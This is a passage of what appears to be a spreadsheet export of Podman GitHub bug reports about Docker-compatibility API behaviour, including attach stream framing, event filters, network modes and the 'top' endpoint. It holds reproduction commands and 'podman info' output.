go: go1.17.12 libseccomp: 2.5.2 os: linux remoteSocket: path: /run/user/1001/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_NET_RAW,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /bin/slirp4netns package: slirp4netns-1.2.0-2.module+el8.6.0+20857+bf01bdf2.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.4.0 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.2 swapFree: 8539598848 swapTotal: 8539598848 uptime: 4h 35m 58.6s (Approximately 0.17 days) plugins: log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - container-registry.oracle.com - docker.io store: configFile: /home/oracle/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/oracle/.local/share/containers/storage graphRootAllocated: 2187084447744 graphRootUsed: 178915131392 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /run/user/1001/containers volumePath: /home/oracle/.local/share/containers/storage/volumes version: APIVersion: 4.1.1 Built: 1666797126 BuiltTime: Wed Oct 26 15:12:06 2022 GitCommit: "" GoVersion: go1.17.12 Os: linux OsArch: linux/amd64 Version: 4.1.1  **Package info (e.g. output of `rpm -q podman` or `apt list podman` or `brew info podman`):**  podman-4.1.1-7.module+el8.6.0+20857+bf01bdf2.x86_64  Have tested with OL9 which is 4.2.x podman **Additional environment details (AWS, VirtualBox, physical, etc.):** Cloud based vm</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/16856</t>
  </si>
  <si>
    <t>non-tty logs/container attach format broken</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** Podman seems to have a bug in attach format which is described here https://docs.docker.com/engine/api/v1.41/#tag/Container/operation/ContainerAttach The bug only seems to appear for the log items produced *before* the attach command is executed, not after **Steps to reproduce the issue:** 1. Start a container which prints a 4-byte message on stdout each second during 10 seconds 2. Wait for 5 seconds 3. Attach to the container and save the output The same steps in form of a script:  sudo podman run -d --rm --name test alpine sh -c 'for i in $(seq 0 10); do printf "%03d\n" $i; sleep 1; done' sleep 5 sudo curl -X POST --unix /run/podman/podman.sock 'http://localhost/containers/test/attach?logs=true&amp;stream=true&amp;stdout=true' --output dump.bin  **Describe the results you received:** Looking at the `dump.bin` produced with the above reproduction procedure, one can clearly see how the `length` field is incorrect (indicates 3 bytes for a 4-byte payload) during the first 5 seconds, and correct (indicates 4 bytes) during the last 5 seconds.  h01:~$ xxd -c12 dump.bin 00000000: 0100 0000 0000 0003 3030 300a 000. 0000000c: 0100 0000 0000 0003 3030 310a 001. 00000018: 0100 0000 0000 0003 3030 320a 002. 00000024: 0100 0000 0000 0003 3030 330a 003. 00000030: 0100 0000 0000 0003 3030 340a 004. 0000003c: 0100 0000 0000 0003 3030 350a 005. 00000048: 0100 0000 0000 0004 3030 360a 006. 00000054: 0100 0000 0000 0004 3030 370a 007. 00000060: 0100 0000 0000 0004 3030 380a 008. 0000006c: 0100 0000 0000 0004 3030 390a 009. 00000078: 0100 0000 0000 0004 3031 300a 010.  **Describe the results you expected:** I expected the `length` to be `4` for all messages. **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  $ podman version Client: Podman Engine Version: 4.3.1 API Version: 4.3.1 Go Version: go1.19.4 Built: Tue Dec 13 02:00:33 2022 OS/Arch: linux/amd64  **Output of `podman info`:**  $ podman info host: arch: amd64 buildahVersion: 1.28.0 cgroupControllers: [] cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.5-r0 path: /usr/bin/conmon version: 'conmon version 2.1.5, commit: unknown' cpuUtilization: idlePercent: 99.74 systemPercent: 0.12 userPercent: 0.15 cpus: 1 distribution: distribution: alpine version: 3.17.0 eventLogger: file hostname: h01 idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 uidmap: - container_id: 0 host_id: 1000 size: 1 kernel: 5.15.82-0-virt linkmode: dynamic logDriver: k8s-file memFree: 1847091200 memTotal: 2087096320 networkBackend: netavark ociRuntime: name: crun package: crun-1.7.2-r0 path: /usr/bin/crun version: |- crun version 1.7.2 commit: 0356bf4aff9a133d655dc13b1d9ac9424706cac4 rundir: /tmp/podman-run-1000/crun spec: 1.0.0 +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL os: linux remoteSocket: path: /tmp/podman-run-1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /etc/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-r0 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.4 swapFree: 0 swapTotal: 0 uptime: 0h 46m 48.00s plugins: authorization: null log: - k8s-file - none - passthrough network: - bridge - macvlan volume: - local registries: search: - docker.io store: configFile: /home/docker/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/docker/.local/share/containers/storage graphRootAllocated: 4226809856 graphRootUsed: 286416896 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /tmp/podman-run-1000/containers volumePath: /home/docker/.local/share/containers/storage/volumes version: APIVersion: 4.3.1 Built: 1670896833 BuiltTime: Tue Dec 13 02:00:33 2022 GitCommit: "" GoVersion: go1.19.4 Os: linux OsArch: linux/amd64 Version: 4.3.1  **Package info (e.g. output of `rpm -q podman` or `apt list podman` or `brew info podman`):**  $ apk info podman podman-4.3.1-r1 description: Simple management tool for pods, containers and images podman-4.3.1-r1 webpage: https://podman.io/ podman-4.3.1-r1 installed size: 39 MiB  **Have you tested with the latest version of Podman and have you checked [the Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md)?** Yes **Additional environment details (AWS, VirtualBox, physical, etc.):**</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/16857</t>
  </si>
  <si>
    <t>events API docker compatibility issue</t>
  </si>
  <si>
    <t>&lt;!--  BUG REPORT INFORMATION  Use the commands below to provide key information from your environment: You do NOT have to include this information if this is a FEATURE REQUEST **NOTE** A large number of issues reported against Podman are often found to already be fixed in more current versions of the project. Before reporting an issue, please verify the version you are running with `podman version` and compare it to the latest release documented on the top of Podman's [README.md](../README.md). If they differ, please update your version of Podman to the latest possible and retry your command before creating an issue. Also, there is a running list of known issues in the [Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md), please reference that page before opening a new issue. If you are filing a bug against `podman build`, please instead file a bug against Buildah (https://github.com/containers/buildah/issues). Podman build executes Buildah to perform container builds, and as such the Buildah maintainers are best equipped to handle these bugs. --&gt; **Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** Podman expects the podman-style "died" name of the event rather than docker-style "die" event in an event filter expression. This is a compatibility issue with docker-compatible clients. **Steps to reproduce the issue:** 1. Start a container sleeping for a short period of time 2. Subscribe to events using Docker compatibility API, indicating the following filter `{"event":["die"]}` and observe the absence of events. To compare with a working case, repeat steps 1 and 2 substituting the filter for `{"event": ["died"]}` and observe the event called `die` when the container in step 1 finishes. In form of script, steps 1 and 2 (using docker-style event name):  sudo podman run -d --rm --name test alpine sleep 2 sudo curl --unix /run/podman/podman.sock 'http://localhost/events?filters=%7B"container":%5B"test"%5D,"event ":%5B"die"%5D%7D' # no event here  Using podman-style event name:  sudo podman run -d --rm --name test alpine sleep 2 sudo curl --unix /run/podman/podman.sock 'http://localhost/events?filters=%7B"container":%5B"test"%5D,"event ":%5B"died"%5D%7D' # the event is printed  **Describe the results you received:** No event arrives in step 2 of the reproduction example. **Describe the results you expected:** I expected to see the "die" event from step 2 in the reproduction example:  {"status":"die","id":"b04f2ec34e7972ee8cd405474e73805db0aa082b3fb12e20958e9c3a781d5bc0","from":"docker.io/library/alpine:latest","Type":"container","Action":"die","Actor":{"ID":"b04f2ec34e7972ee8cd405474e73805db0aa082b3fb12e20958e9c3a781d5bc0","Attributes":{"containerExitCode":"0","exitCode":"0","image":"docker.io/library/alpine:latest","name":"test","podId":""}},"scope":"local","time":1671122524,"timeNano":1671122524154484836}  **Additional information you deem important (e.g. issue happens only occasionally):** I think both `die` and `died` should be supported in a filter expression, for backwards compatibility with previous Podman versions. **Output of `podman version`:**  $ podman version Client: Podman Engine Version: 4.3.1 API Version: 4.3.1 Go Version: go1.19.4 Built: Tue Dec 13 02:00:33 2022 OS/Arch: linux/amd64  **Output of `podman info`:**  $ podman info host: arch: amd64 buildahVersion: 1.28.0 cgroupControllers: [] cgroupManager: cgroupfs cgroupVersion: v1 conmon: package: conmon-2.1.5-r0 path: /usr/bin/conmon version: 'conmon version 2.1.5, commit: unknown' cpuUtilization: idlePercent: 99.73 systemPercent: 0.11 userPercent: 0.16 cpus: 1 distribution: distribution: alpine version: 3.17.0 eventLogger: file hostname: h01 idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 uidmap: - container_id: 0 host_id: 1000 size: 1 kernel: 5.15.82-0-virt linkmode: dynamic logDriver: k8s-file memFree: 1841414144 memTotal: 2087096320 networkBackend: netavark ociRuntime: name: crun package: crun-1.7.2-r0 path: /usr/bin/crun version: |- crun version 1.7.2 commit: 0356bf4aff9a133d655dc13b1d9ac9424706cac4 rundir: /tmp/podman-run-1000/crun spec: 1.0.0 +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +YAJL os: linux remoteSocket: path: /tmp/podman-run-1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /etc/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-r0 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.4 swapFree: 0 swapTotal: 0 uptime: 1h 19m 14.00s (Approximately 0.04 days) plugins: authorization: null log: - k8s-file - none - passthrough network: - bridge - macvlan volume: - local registries: search: - docker.io store: configFile: /home/docker/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/docker/.local/share/containers/storage graphRootAllocated: 4226809856 graphRootUsed: 286445568 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /tmp/podman-run-1000/containers volumePath: /home/docker/.local/share/containers/storage/volumes version: APIVersion: 4.3.1 Built: 1670896833 BuiltTime: Tue Dec 13 02:00:33 2022 GitCommit: "" GoVersion: go1.19.4 Os: linux OsArch: linux/amd64 Version: 4.3.1  **Package info (e.g. output of `rpm -q podman` or `apt list podman` or `brew info podman`):**  $ apk info podman podman-4.3.1-r1 description: Simple management tool for pods, containers and images podman-4.3.1-r1 webpage: https://podman.io/ podman-4.3.1-r1 installed size: 39 MiB  **Have you tested with the latest version of Podman and have you checked [the Podman Troubleshooting Guide](https://github.com/containers/podman/blob/main/troubleshooting.md)?** Yes **Additional environment details (AWS, VirtualBox, physical, etc.):**</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/16915</t>
  </si>
  <si>
    <t>--network=default doesn't mean the same thing as --network=</t>
  </si>
  <si>
    <t>**Is this a BUG REPORT or FEATURE REQUEST? (leave only one on its own line)** /kind bug **Description** While debugging some unexpected interactions between a docker client and podman server on my side, I found out that the flag `--network=default` doesn't mean the same thing as `--network=` (or the absence of `--network=XXX` flag). Note that docker docker client will explicitly pass NetworkMode=default when calling the docker daemon HTTP api, if no `--network` flag was provided to the docker CLI. **Steps to reproduce the issue:** All this was done using the very latest `quay.io/podman/upstream` image started in privileged mode. 1. Create couple of containers, with different `--network` flags:  [root@a3a34f67a163 /]# podman create --cidfile=no-explicit-flag fedora Resolved "fedora" as an alias (/etc/containers/registries.conf.d/000-shortnames.conf) Trying to pull registry.fedoraproject.org/fedora:latest Getting image source signatures Copying blob 1842e4e4b562 done Copying config 19c0ae4dd2 done Writing manifest to image destination Storing signatures b987b9bc53e056f024da0ed0cca4fc9e598edd512df7ffad8dc007d740c3b790 [root@a3a34f67a163 /]# podman create --network= --cidfile=explicitly-empty-flag fedora 92023ad1e615bcea04be21569a1139446a1c0aa2b69d3298d926ef4c5de1d045 [root@a3a34f67a163 /]# podman create --network=default --cidfile=explicitly-default-flag fedora b7287211a64864d4bad9872c973be2abbde56d67e0f43caa44348aa7717a1944  2. Now inspect a bit the NetworkMode for each (note: I use the `quay.io/podman/upstream` which has a containers.conf file which hardcodes the network mode to `host`:  [root@a3a34f67a163 /]# podman inspect $(cat no-explicit-flag)|grep NetworkMode "NetworkMode": "host", [root@a3a34f67a163 /]# podman inspect $(cat explicitly-empty-flag)|grep NetworkMode "NetworkMode": "host", [root@a3a34f67a163 /]# podman inspect $(cat explicitly-default-flag)|grep NetworkMode "NetworkMode": "bridge",  3. Now install the Docker CLI, start a podman socket with `system service` (I won't show how to do it), and try to create a container with no explicit `--network` flag with the docker client, it will use the bridge mode by default:  [root@a3a34f67a163 /]# DOCKER_HOST=unix:var/run/podman/podman.sock docker create --cidfile=no-explicit-flag-from-docker-cli fedora 1ebc2db1ef56c75a5588e3c0599c554835a7a352b700856b3fe53fbe1e53b48b [root@a3a34f67a163 /]# podman --remote inspect $(cat no-explicit-flag-from-docker-cli)|grep NetworkMode "NetworkMode": "bridge",  **Describe the results you received:** The explicit `--network=default` flags resolves to the `bridge` network mode, while I would have expected the `host` one (in my conditions, as this is one overriden in the `containers.conf` file). **Describe the results you expected:** I would expect that in the same conditions, a container started explicitly with `--network=default` (or a container started with the docker CLI without providing any `--network` flag) uses the `host` network mode (as this is one overriden in the `containers.conf` file), just like when we run podman with no explicit `--network` flag. Basically no matter which client podman vs docker is used, the end result should be the same. **Additional information you deem important (e.g. issue happens only occasionally):** **Output of `podman version`:**  [root@a3a34f67a163 /]# podman version Client: Podman Engine Version: 4.4.0-dev API Version: 4.4.0-dev Go Version: go1.19.3 Built: Thu Jan 1 00:00:00 1970 OS/Arch: linux/amd64</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17204</t>
  </si>
  <si>
    <t>APIv2 tests: python something != something-podman</t>
  </si>
  <si>
    <t>Seeing this occasionally since Dec 30:  ________________________ ContainerTestCase.test_attach _________________________ self = &lt;python.rest_api.test_v2_0_0_container.ContainerTestCase testMethod=test_attach&gt; def test_attach(self): r = requests.post( self.podman_url + "/v1.40/containers/create?name=topcontainer", json={"Cmd": ["sh", "-c", "echo podman; sleep 100"], "Image": "alpine:latest"}, ) self.assertEqual(r.status_code, 201, r.text) payload = r.json() r = requests.post( self.podman_url + f"/v1.40/containers/{payload['Id']}/start" ) self.assertEqual(r.status_code, 204, r.text) r = requests.post( self.podman_url + f"/v1.40/containers/{payload['Id']}/attach?logs=true&amp;stream=false" ) self.assertIn(r.status_code, (101, 200), r.text) # see the attach format docs, stdout = 1, length = 7, message = podman\n &gt; self.assertEqual(r.content, b"\x01\x00\x00\x00\x00\x00\x00\x07podman\n", r.text) E AssertionError: b'' != b'\x01\x00\x00\x00\x00\x00\x00\x07podman\n' : test/apiv2/python/rest_api/test_v2_0_0_container.py:155: AssertionError  short test summary info  FAILED test/apiv2/python/rest_api/test_v2_0_0_container.py::ContainerTestCase::test_attach  1 failed, 43 passed in 78.37s (0:01:18)   If I read the URL correctly, this has something to do with `logs`, and ISTR other flakes in podman-remote logs but can't find the issue number. * fedora-37 : APIv2 test on fedora-37 (root) * PR #17165 * [01-19 06:53](https://api.cirrus-ci.com/v1/task/5030036521091072/logs/main.log) * PR #16997 * [01-05 03:10](https://api.cirrus-ci.com/v1/task/4694463075844096/logs/main.log) * PR #16978 * [01-04 03:14](https://api.cirrus-ci.com/v1/task/4749243169112064/logs/main.log) * PR #16810 * [12-30 10:43](https://api.cirrus-ci.com/v1/task/5556295575535616/logs/main.log) * [12-30 10:30](https://api.cirrus-ci.com/v1/task/5214991905718272/logs/main.log)</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17341</t>
  </si>
  <si>
    <t>[Bug]: Listing network from Docker fails during container removal</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description If you start Podman API server and try to inspect a network from Docker (or Docker-compatible library, e.g. one used by Gitlab Runner) you get also a list of containers in that network (for backward compatibility with Docker, Podman doesn't show that data). But if container is currently being removed -or added, not sure here - this request fails with:  Error response from daemon: container &lt;container id&gt; does not exist in database: no such container  The interesting part is that you get the same error even if you run `docker network ls` instead of `docker network inspect &lt;network&gt;`. I believe it may be the cause of [this Gitlab Runner issue](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/28971) (or it's at least one of the causes) and one similar error that I believe has not been reported to Gitlab yet that I've only observed with Podman 4.4.  Steps to reproduce the issue Steps to reproduce the issue 1. Start Podman API server (`podman system service`). 2. Create a network (`podman network create test`). 3. Configure **native docker** to use Podman's socket (`export DOCKER_HOST=unix://&lt;path to socket&gt;`). 4. Loop container creation (check below the list for an example code). 5. Watch either output of `docker network list` or `docker network inspect test` (check below the list for an example code). Example creation loop: bash while true do podman run -d --rm -ti --network test fedora sleep 1; done  Example watch (you need to open the file to find those lines, terminal control keys used to clear screan are stored in it so simple `cat` won't work): bash watch -tn 0.1 --exec docker network ls | tee -a test.log   Describe the results you received Podman server sometimes fails with container not found error. Log entry:  INFO[0052] Request Failed(Internal Server Error): container cf3b535ee60be15c9b5ed36240caa923119be4f06f9ff80bd98620d3c7e3ef3e does not exist in database: no such container @ - - [02/Feb/2023:17:15:09 +0000] "GET /v1.41/networks HTTP/1.1" 500 178 "" "Docker-Client/20.10.23 (linux)"   Describe the results you expected No errors for either request. Ff Podman finds it cannot retrieve container details because it does no longer exist it should just remove it from `network inspect` output. In case of `network list` I'm not even sure if there is a reason to create this containers list in the first place - does JSON response contain that field? I don't see an option in docker's cli to show containers in this view.  podman info output shell host: arch: amd64 buildahVersion: 1.29.0 cgroupControllers: - cpuset - cpu - memory - pids cgroupManager: cgroupfs cgroupVersion: v2 conmon: package: Unknown path: /usr/local/libexec/podman/conmon version: 'conmon version 2.1.5, commit: 4cb1e4d73699ce0cef2c3d89b652b3d15be429b3' cpuUtilization: idlePercent: 98.16 systemPercent: 0.57 userPercent: 1.27 cpus: 4 distribution: distribution: fedora variant: cloud version: "37" eventLogger: file hostname: &lt;cut&gt; idMappings: gidmap: - container_id: 0 host_id: 993 size: 1 - container_id: 1 host_id: 200000 size: 65536 uidmap: - container_id: 0 host_id: 993 size: 1 - container_id: 1 host_id: 200000 size: 65536 kernel: 6.1.8-200.fc37.x86_64 linkmode: dynamic logDriver: k8s-file memFree: 1381150720 memTotal: 8329515008 networkBackend: netavark ociRuntime: name: crun package: crun-1.7.2-3.fc37.x86_64 path: /usr/bin/crun version: |- crun version 1.7.2 commit: 0356bf4aff9a133d655dc13b1d9ac9424706cac4 rundir: /run/user/993/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/993/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-8.fc37.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 8328572928 swapTotal: 8328835072 uptime: 27h 58m 5.00s (Approximately 1.12 days) plugins: authorization: null log: - k8s-file - none - passthrough network: - bridge - macvlan volume: - local registries: docker.io: Blocked: false Insecure: false Location: docker.io MirrorByDigestOnly: false Mirrors: &lt;cut&gt; Prefix: docker.io PullFromMirror: "" : &lt;cut&gt; search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io - quay.io store: configFile: /home/gitlab-runner/.config/containers/storage.conf containerStore: number: 10 paused: 0 running: 1 stopped: 9 graphDriverName: overlay graphOptions: {} graphRoot: /home/gitlab-runner/.local/share/containers/storage graphRootAllocated: 52527345664 graphRootUsed: 5485887488 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 8 runRoot: /run/user/993/containers transientStore: false volumePath: /home/gitlab-runner/.local/share/containers/storage/volumes version: APIVersion: 4.4.0 Built: 1675343283 BuiltTime: Thu Feb 2 13:08:03 2023 GitCommit: "" GoVersion: go1.19.5 Os: linux OsArch: linux/amd64 Version: 4.4.0   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details Running on Fedora 37 in a VM with self-compiled Podman and conmon. SELinux enabled. Same error observed earlier using latest Fedora 37 packages (Podman 4.3.1, conmon 2.1.5). Same Gitlab Runner issue observed even earlier (on Podman 4.3.0, older conmon, runc, netavark, aardvark, etc.) although I don't have exact versions nor a way to confirm 100% that it means it's caused by the same problem. If this is the case then oldest report (author of that Gitlab issue) comes from Podman 3.4.2.  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17385</t>
  </si>
  <si>
    <t>[Bug]: network modes `none` and `host` should create entries in `NetworkSettings.Networks`</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description When creating a container with network mode `host` or `none` using docker, the network settings contain entries with those names, respectively. With podman, the networks map is empty.  Steps to reproduce the issue Steps to reproduce the issue 1. run a container with network mode `host` or `none` (`podman run --network=host alpine sleep 1000`) 2. check the container's network settings (`podman inspect $id`)  Describe the results you received No entries in the networks map.  Describe the results you expected Examples from docker json "Networks": { "none": { "IPAMConfig": null, "Links": null, "Aliases": null, "NetworkID": "840780b61c9fe68c120a0ba5b71158bfab274e9874ff8adba18381c962647e32", "EndpointID": "21b3555e8d0431ba777bd7e5e0f3e9f38525c5cf98cd9c3ead83d83bcaed15b2", "Gateway": "", "IPAddress": "", "IPPrefixLen": 0, "IPv6Gateway": "", "GlobalIPv6Address": "", "GlobalIPv6PrefixLen": 0, "MacAddress": "", "DriverOpts": null } }  json "Networks": { "host": { "IPAMConfig": null, "Links": null, "Aliases": null, "NetworkID": "7713bb616c867a4104cdd9c1f70f32c7c5b5f1714d5542410386fcb8b33d0ca9", "EndpointID": "158dea76994f883b58b373a56b4daef5a7b2b4e36cc041a6f09c73832738a2aa", "Gateway": "", "IPAddress": "", "IPPrefixLen": 0, "IPv6Gateway": "", "GlobalIPv6Address": "", "GlobalIPv6PrefixLen": 0, "MacAddress": "", "DriverOpts": null } }   podman info output yaml host: arch: amd64 buildahVersion: 1.29.0 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.5-1.fc37.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.5, commit: ' cpuUtilization: idlePercent: 96.34 systemPercent: 0.95 userPercent: 2.71 cpus: 16 distribution: distribution: fedora variant: workstation version: "37" eventLogger: journald hostname: honestmistake idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 6.1.9-200.fc37.x86_64 linkmode: dynamic logDriver: journald memFree: 21072125952 memTotal: 32835108864 networkBackend: netavark ociRuntime: name: crun package: crun-1.7.2-3.fc37.x86_64 path: /usr/bin/crun version: |- crun version 1.7.2 commit: 0356bf4aff9a133d655dc13b1d9ac9424706cac4 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux remoteSocket: exists: true path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.0-8.fc37.x86_64 version: |- slirp4netns version 1.2.0 commit: 656041d45cfca7a4176f6b7eed9e4fe6c11e8383 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.3 swapFree: 8589930496 swapTotal: 8589930496 uptime: 0h 34m 4.00s plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan volume: - local registries: localhost: Blocked: false Insecure: true Location: localhost MirrorByDigestOnly: false Mirrors: null Prefix: localhost PullFromMirror: "" search: - docker.io store: configFile: /home/jakob/.config/containers/storage.conf containerStore: number: 64 paused: 0 running: 5 stopped: 59 graphDriverName: overlay graphOptions: {} graphRoot: /home/jakob/.local/share/containers/storage graphRootAllocated: 510405902336 graphRootUsed: 358397812736 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 107 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/jakob/.local/share/containers/storage/volumes version: APIVersion: 4.4.0 Built: 1675341170 BuiltTime: Thu Feb 2 13:32:50 2023 GitCommit: "" GoVersion: go1.19.5 Os: linux OsArch: linux/amd64   Podman in a container No  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details _No response_  Additional information This is required for full docker compatibility, to make the testcontainers-java test suite pass, see https://github.com/testcontainers/testcontainers-java/pull/6158 I'm not sure how big the scope of the required changes for this is, but I'd be happy to contribute a fix if someone can point me in the right direction.</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/17524</t>
  </si>
  <si>
    <t>podman socket API top returns Titles as single string instead of array of strings</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description I'm using RHEL 9.1 and podman 4.2.0 with crun 1.5. I was trying to get a container functional with is based on [newrelic infrastructure agent](https://docs.newrelic.com/docs/infrastructure/install-infrastructure-agent/linux-installation/docker-instrumentation-infrastructure-monitoring/). The agent was tested with docker initially, but I wanted to test it using podman. As the container requires the docker socket to be mounted into the container I started the podman.socket. However I noticed that there were errors regarding querying container processes using the `docker top` from within the container. That is the container queries the REST API of the podman.socket for processes. Curious on what why this is failing I investigated the podman REST endpoint and found that the GET request documented here: https://docs.podman.io/en/latest/_static/api.html#tag/containers-(compat)/operation/ContainerList behaves different for the "Titles" field in the response. This should be an array of strings, however using: curl --silent -XGET --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock -H 'Content-Type: application/json' http://localhost/containers/321be6b5b7264ee5dfe651fe78355c3ce450c3167f245136bcf5cb66ae9107fe/top delivers ONE string for "Titles": { ,"Titles":[**"PID USER TIME COMMAND"**]} However this is ONE string and not an array as stated in the documentation.  Steps to reproduce the issue Steps to reproduce the issue 1. systemctl --user start podman.socket 2. start at least one container and note the id of that container 3. curl --silent -XGET --unix-socket $XDG_RUNTIME_DIR/podman/podman.sock -H 'Content-Type: application/json' http://localhost/containers/&lt;CONTAINER_ID_REPLACE_ME&gt;/top  Describe the results you received The "Titles" from the response is: { ,"Titles":[**"PID USER TIME COMMAND"**]}  Describe the results you expected The "Titles" field should be: "Titles":[**"PID", "USER", "TIME", "COMMAND"**]}  podman info output yaml host: 